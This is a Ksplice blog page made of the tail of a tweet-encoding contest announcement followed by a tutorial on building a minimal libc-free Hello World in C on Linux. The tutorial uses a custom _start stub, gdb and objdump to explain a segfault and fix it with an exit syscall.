Write a description, in English, for how your coding scheme works. Explain how many bits per tweet it achieves, and justify your calculation. The explanation must be convincing because it is intractable to prove conclusively that a certain capacity is achievable, even if a program successfully sends and receives many test cases.
Send your entry, consisting of #2 and #3, to megatwit@ksplice.com before Sunday, April 11, 2010, 23h59 UTC.
Based on the English explanations of the coding schemes (#3), we'll select finalists from among the entrants. In mid-April, we'll post the finalists' submissions on the blog. In the spirit of Twitter, we'll let the community assess, criticize, test, and pick apart the finalists' entries.
Based on the community's feedback, we'll choose at least one winner. This will generally be the person whose scheme for achieving the highest information encoded per tweet is judged most convincing.
The winner will receive notoriety and fame on this blog, and a smart-looking Ksplice T-shirt in the size of your choice. You will be known the world over as the Reigning Champion of the International Longest Tweet Contest until there is another contest. Legally we can't promise this, but there's a chance Stephen Colbert will have you on as a result of winning this prestigious contest.
By entering the contest, you are giving Ksplice permission to post your entry if you are selected as a finalist. The contest is void where prohibited. The rules are subject to change at our discretion. Employees of Ksplice aren't eligible because they already have T-shirts. Judging will be done by Ksplice in its sole discretion.
That's it. Happy tweeting!
Hello from a libc-free world! (Part 1)
Posted in computer architecture on March 16th, 2010 by Jessica McKellar – 104 Comments
As an exercise, I want to write a Hello World program in C simple enough that I can disassemble it and be able to explain all of the assembly to myself.
This should be easy, right?
This adventure assumes compilation and execution on a Linux machine. Some familiarity with reading assembly is helpful.
Here’s our basic Hello World program:
jesstess@kid-charlemagne:~/c$ cat hello.c
#include <stdio.h>

int main()
{
    printf("Hello World\n");
    return 0;
}

Let’s compile it and get a bytecount:
jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10931 hello

Yikes! Where are 11 Kilobytes worth of executable coming from? objdump -t hello gives us 79 symbol-table entries, most of which we can blame on our using the standard library.
So let’s stop using it. We won’t use printf so we can get rid of our include file:
jesstess@kid-charlemagne:~/c$ cat hello.c
int main()
{
    char *str = "Hello World";
    return 0;
}
Recompiling and checking the bytecount:
jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10892 hello

What? That barely changed anything!
The problem is that gcc is still using standard library startup files when linking. Want proof? We’ll compile with -nostdlib, which according to the gcc man page won’t “use the standard system libraries and startup files when linking. Only the files you specify will be passed to the linker”.
jesstess@kid-charlemagne:~/c$ gcc -nostdlib -o hello hello.c
/usr/bin/ld: warning: cannot find entry symbol _start; defaulting to 00000000004000e8

Well, it’s just a warning; let’s check it anyway:
jesstess@kid-charlemagne:~/c$ wc -c hello
1329 hello

That looks pretty good! We got our bytecount down to a much more reasonable size (an order of magnitude smaller!)…
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

…at the expense of segfaulting when it runs. Hrmph.
For fun, let’s get our program to be actually runnable before digging into the assembly.
So what is this _start entry symbol that appears to be required for our program to run? Where is it usually defined if you’re using libc?
From the perspective of the linker, by default _start is the actual entry point to your program, not main. It is normally defined in the crt1.o ELF relocatable. We can verify this by linking against crt1.o and noting that _start is now found (although we develop other problems by not having defined other necessary libc startup symbols):
# Compile the source files but don't link
jesstess@kid-charlemagne:~/c$ gcc -Os -c hello.c
# Now try to link
jesstess@kid-charlemagne:~/c$ ld /usr/lib/crt1.o -o hello hello.o
/usr/lib/crt1.o: In function `_start':
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:106: undefined reference to `__libc_csu_fini'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:107: undefined reference to `__libc_csu_init'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:113: undefined reference to `__libc_start_main'
This check conveniently also tells us where _start lives in the libc source: sysdeps/x86_64/elf/start.S for this particular machine. This delightfully well-commented file exports the _start symbol, sets up the stack and some registers, and calls __libc_start_main. If we look at the very bottom of csu/libc-start.c we see the call to our program’s main:
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
and down the rabbit hole we go.
So that’s what _start is all about. Conveniently, we can summarize what happens between _start and the call to main as “set up a bunch of stuff for libc and then call main”, and since we don’t care about libc, let’s just export our own _start symbol that just calls main and link against that:
jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
call main
Compiling and running with our stub _start assembly file:
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

Hurrah, our compilation problems go away! However, we still segfault. Why? Let’s compile with debugging information and take a look in gdb. We’ll set a breakpoint at main and step through until the segfault:
jesstess@kid-charlemagne:~/c$ gcc -g -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ gdb hello
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x4000f4: file hello.c, line 3.
(gdb) run
Starting program: /home/jesstess/c/hello

Breakpoint 1, main () at hello.c:5
5 char *str = "Hello World";
(gdb) step
6 return 0;
(gdb) step
7 }
(gdb) step
0x00000000004000ed in _start ()
(gdb) step
Single stepping until exit from function _start,
which has no line number information.
main () at helloint.c:4
4 {
(gdb) step

Breakpoint 1, main () at helloint.c:5
5 char *str = "Hello World";
(gdb) step
6 return 0;
(gdb) step
7 }
(gdb) step

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000001 in ?? ()
(gdb)
Wait, what? Why are we running through main twice? …It’s time to look at the assembly:
jesstess@kid-charlemagne:~/c$ objdump -d hello

hello: file format elf64-x86-64

Disassembly of section .text:

00000000004000e8 <_start>:
4000e8: e8 03 00 00 00 callq 4000f0 <main>
4000ed: 90 nop
4000ee: 90 nop
4000ef: 90 nop

00000000004000f0 <main>:
4000f0: 55 push %rbp
4000f1: 48 89 e5 mov %rsp,%rbp
4000f4: 48 c7 45 f8 03 01 40 movq $0x400103,-0x8(%rbp)
4000fb: 00
4000fc: b8 00 00 00 00 mov $0x0,%eax
400101: c9 leaveq
400102: c3 retq

D’oh! Let’s save a detailed examination of the assembly for later, but in brief: when we return from the callq to main we hit some nops and run right back into main. Since we re-entered main without putting a return instruction pointer on the stack as part of the standard prologue for calling a function, the second call to retq tries to pop a bogus return instruction pointer off the stack and jump to it and we bomb out. We need an exit strategy.
Literally. After the return from callq, put 1, the syscall number for SYS_exit, into %eax, and because we want to say that we're exiting cleanly, put a status of 0, SYS_exit's only argument, into %ebx (the xorl below zeroes it). Then make the interrupt to drop into the kernel with int $0x80.
jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
call main
movl $1, %eax
xorl %ebx, %ebx
int $0x80
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
jesstess@kid-charlemagne:~/c$

Success! It compiles, it runs, and if we step through this new version under gdb it even exits normally.
Hello from a libc-free world!
Stay tuned for Part 2, where we’ll walk through the parts of the executable in earnest and watch what happens to it as we add complexity, in the process understanding more about x86 linking and calling conventions and the structure of an ELF binary.
Reference: http://blog.ksplice.com/2010